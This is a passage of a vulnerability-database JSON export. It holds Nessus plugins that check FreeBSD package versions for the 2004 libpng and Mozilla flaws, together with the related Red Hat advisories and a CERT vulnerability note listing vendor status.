(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36897);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"CERT\", value:\"160448\");\n script_xref(name:\"CERT\", value:\"236656\");\n script_xref(name:\"CERT\", value:\"286464\");\n script_xref(name:\"CERT\", value:\"388984\");\n script_xref(name:\"CERT\", value:\"477512\");\n script_xref(name:\"CERT\", value:\"817368\");\n script_xref(name:\"Secunia\", value:\"12219\");\n script_xref(name:\"Secunia\", value:\"12232\");\n\n script_name(english:\"FreeBSD : libpng stack-based buffer overflow and other code concerns (f9e3e60b-e650-11d8-9b0a-000347a4fa7d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans has discovered multiple vulnerabilities in libpng, which\ncan be exploited by malicious people to compromise a vulnerable system\nor cause a DoS (Denial of Service).\"\n );\n # http://www.securityfocus.com/archive/1/370853\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/370853\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://scary.beasts.org/security/CESA-2004-001.txt\"\n );\n # http://bugzilla.mozilla.org/show_bug.cgi?id=251381\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=251381\"\n );\n # http://www.uscert.gov/cas/techalerts/TA04-217A.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0481eb4e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://dl.sourceforge.net/sourceforge/libpng/ADVISORY.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ace326c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:de-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:fr-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-netscape-communicator-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-netscape-navigator-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ko-netscape-communicator-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ko-netscape-navigator-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-netscape-communicator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-netscape-navigator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-png\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-gtk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:netscape-communicator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:netscape-navigator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:png\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pt_BR-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"png<=1.2.5_7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-png<=1.0.14_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-png>=1.2<=1.2.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"firefox<0.9.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"thunderbird<0.7.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla<1.7.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla-devel<1.7.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla<1.7.2,2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla>=1.8.a,2<=1.8.a2,2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-gtk1<1.7.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"netscape-communicator<=4.78\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"netscape-navigator<=4.78\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-netscape-communicator<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-netscape-navigator<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ko-netscape-navigator-linux<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ko-netscape-communicator-linux<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-netscape-communicator-linux<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-netscape-navigator-linux<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"netscape7<=7.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-netscape7<=7.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"pt_BR-netscape7<=7.02\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"fr-netscape7<=7.02\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"de-netscape7<=7.02\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:24:43", "description": "The following package needs to be updated: firefox", "edition": 1, "published": "2004-08-06T00:00:00", "type": "nessus", "title": "FreeBSD : libpng stack-based buffer overflow and other code concerns (94)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-06T00:00:00", "id": "FREEBSD_LIBPNG_1257.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14216", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_f9e3e60be65011d89b0a000347a4fa7d.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(14216);\n script_version(\"$Revision: 1.14 $\");\n script_cve_id(\"CVE-2004-0599\");\n script_cve_id(\"CVE-2004-0598\");\n script_cve_id(\"CVE-2004-0597\");\n\n script_name(english:\"FreeBSD : libpng stack-based buffer overflow and other code concerns (94)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: firefox');\nscript_set_attribute(attribute: 'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://bugzilla.mozilla.org/show_bug.cgi?id=251381\nhttp://dl.sourceforge.net/sourceforge/libpng/ADVISORY.txt\nhttp://scary.beasts.org/security/CESA-2004-001.txt\nhttp://secunia.com/advisories/12219\nhttp://secunia.com/advisories/12232\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html#seamonkey1.0.3\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-09.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-10.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-11.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-12.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-13.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-44.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-47.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-48.html\nhttp://www.osvdb.org/8312\nhttp://www.osvdb.org/8313\nhttp://www.osvdb.org/8314\nhttp://www.osvdb.org/8315\nhttp://www.osvdb.org/8316');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/08/06\");\n script_end_attributes();\n script_summary(english:\"Check for firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #36897 (freebsd_pkg_f9e3e60be65011d89b0a000347a4fa7d.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=10;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"png<=1.2.5_7\");\n\npkg_test(pkg:\"linux-png<=1.0.14_3\");\n\npkg_test(pkg:\"linux-png>=1.2.*<=1.2.2\");\n\npkg_test(pkg:\"firefox<0.9.3\");\n\npkg_test(pkg:\"thunderbird<0.7.3\");\n\npkg_test(pkg:\"linux-mozilla<1.7.2\");\n\npkg_test(pkg:\"linux-mozilla-devel<1.7.2\");\n\npkg_test(pkg:\"mozilla<1.7.2,2\");\n\npkg_test(pkg:\"mozilla>=1.8.*,2<=1.8.a2,2\");\n\npkg_test(pkg:\"mozilla-gtk1<1.7.2\");\n\npkg_test(pkg:\"netscape-{communicator,navigator}<=4.78\");\n\npkg_test(pkg:\"linux-netscape-{communicator,navigator}<=4.8\");\n\npkg_test(pkg:\"{ja,ko}-netscape-{communicator,navigator}-linux<=4.8\");\n\npkg_test(pkg:\"{,ja-}netscape7<=7.1\");\n\npkg_test(pkg:\"{de-,fr-,pt_BR-}netscape7<=7.02\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1363", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer overflows\nin libpng. An attacker could create a carefully crafted PNG file in such a\nway that it would cause an application linked with libpng to execute\narbitrary code when the file was opened by a victim. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer dereference in\nlibpng (CAN-2004-0598) and several integer overflow issues (CAN-2004-0599).\nAn attacker could create a carefully crafted PNG file in such a way that\nit would cause an application linked with libpng to crash when the file was\nopened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nFor users of Red Hat Enterprise Linux 2.1 these patches also include a more\ncomplete fix for the out of bounds memory access flaw (CAN-2002-1363). \n\nAll users are advised to update to the updated libpng packages which\ncontain backported security patches and are not vulnerable to these issues.", "modified": "2018-05-11T23:27:06", "published": "2004-08-04T04:00:00", "id": "RHSA-2004:402", "href": "https://access.redhat.com/errata/RHSA-2004:402", "type": "redhat", "title": "(RHSA-2004:402) libpng security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:54", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0597", "CVE-2004-0599", "CVE-2004-0718", "CVE-2004-0722", "CVE-2004-0757", "CVE-2004-0758", "CVE-2004-0759", "CVE-2004-0760", "CVE-2004-0761", "CVE-2004-0762", "CVE-2004-0763", "CVE-2004-0764", "CVE-2004-0765"], "description": "Mozilla is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nA number of flaws have been found in Mozilla 1.4 that have been fixed in\nthe Mozilla 1.4.3 release: \n\nZen Parse reported improper input validation to the SOAPParameter object\nconstructor leading to an integer overflow and controllable heap\ncorruption. Malicious JavaScript could be written to utilize this flaw and\ncould allow arbitrary code execution. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-0722 to\nthis issue.\n\nDuring a source code audit, Chris Evans discovered a buffer overflow and\ninteger overflows which affect the libpng code inside Mozilla. An attacker\ncould create a carefully crafted PNG file in such a way that it would cause\nMozilla to crash or execute arbitrary code when the image was viewed.\n(CAN-2004-0597, CAN-2004-0599)\n\nZen Parse reported a flaw in the POP3 capability. A malicious POP3 server\ncould send a carefully crafted response that would cause a heap overflow\nand potentially allow execution of arbitrary code as the user running\nMozilla. (CAN-2004-0757)\n\nMarcel Boesch found a flaw that allows a CA certificate to be imported with\na DN the same as that of the built-in CA root certificates, which can cause\na denial of service to SSL pages, as the malicious certificate is treated\nas invalid. (CAN-2004-0758)\n\nMet - Martin Hassman reported a flaw in Mozilla that could allow malicious\nJavascript code to upload local files from a users machine without\nrequiring confirmation. (CAN-2004-0759)\n\nMindlock Security reported a flaw in ftp URI handling. By using a NULL\ncharacter (%00) in a ftp URI, Mozilla can be confused into opening a\nresource as a different MIME type. (CAN-2004-0760)\n\nMozilla does not properly prevent a frame in one domain from injecting\ncontent into a frame that belongs to another domain, which facilitates\nwebsite spoofing and other attacks, also known as the frame injection\nvulnerability. (CAN-2004-0718)\n\nTolga Tarhan reported a flaw that can allow a malicious webpage to use a\nredirect sequence to spoof the security lock icon that makes a webpage\nappear to be encrypted. (CAN-2004-0761)\n\nJesse Ruderman reported a security issue that affects a number of browsers\nincluding Mozilla that could allow malicious websites to install arbitrary\nextensions by using interactive events to manipulate the XPInstall Security\ndialog box. (CAN-2004-0762)\n\nEmmanouel Kellinis discovered a caching flaw in Mozilla which allows\nmalicious websites to spoof certificates of trusted websites via\nredirects and Javascript that uses the \"onunload\" method. (CAN-2004-0763)\n\nMozilla allowed malicious websites to hijack the user interface via the\n\"chrome\" flag and XML User Interface Language (XUL) files. (CAN-2004-0764)\n\nThe cert_TestHostName function in Mozilla only checks the hostname portion\nof a certificate when the hostname portion of the URI is not a fully\nqualified domain name (FQDN). This flaw could be used for spoofing if an\nattacker had control of machines on a default DNS search path. (CAN-2004-0765)\n\nAll users are advised to update to these erratum packages which contain a\nsnapshot of Mozilla 1.4.3 including backported fixes and are not vulnerable\nto these issues.", "modified": "2019-03-22T23:43:47", "published": "2004-08-04T04:00:00", "id": "RHSA-2004:421", "href": "https://access.redhat.com/errata/RHSA-2004:421", "type": "redhat", "title": "(RHSA-2004:421) mozilla security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:43:45", "bulletinFamily": "info", "cvelist": ["CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains several flaws in progressive image handling that could introduce a remotely exploitable vulnerability.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nThe libpng library features the ability to display interlaced, or progressive display, PNG files or streams. A number of potential integer overflow errors exist in libpng's handling of such progressive display images. While the code that contains these errors introduces dangerous conditions, it is unclear what practical vulnerabilities it might present in applications using libpng. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n286464\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. __ Affected\n\nNotified: July 16, 2004 Updated: June 01, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAPPLE-SA-2004-09-09 Mac OS X 10.3.5\n\nMac OS X 10.3.5 is now available and delivers security enhancements \nfor the following components: \n \nComponent: libpng (Portable Network Graphics) \nCVE-IDs: CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, \nCAN-2004-0598, CAN-2004-0599 \nImpact: Malicious png images can cause application crashes and could \nexecute arbitrary code \n \nDescription: A number of buffer overflows, null pointer dereferences \nand integer overflows have been discovered in the reference library \nfor reading and writing PNG images. These vulnerabilities have been \ncorrected in libpng which is used by the CoreGraphics and AppKit \nframeworks in Mac OS X. After installing this update, applications \nthat use the PNG image format via these frameworks will be protected \nagainst these flaws. \n \nNote: The libpng security fixes are also available separately for Mac \nOS X 10.3.4 and Mac OS X 10.2.8 via Security Update 2004-08-09. \n \nMac OS X 10.3.5 may be obtained from the Software Update \npane in System Preferences, or Apple's Software Downloads web site: \n<http://www.apple.com/support/downloads/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 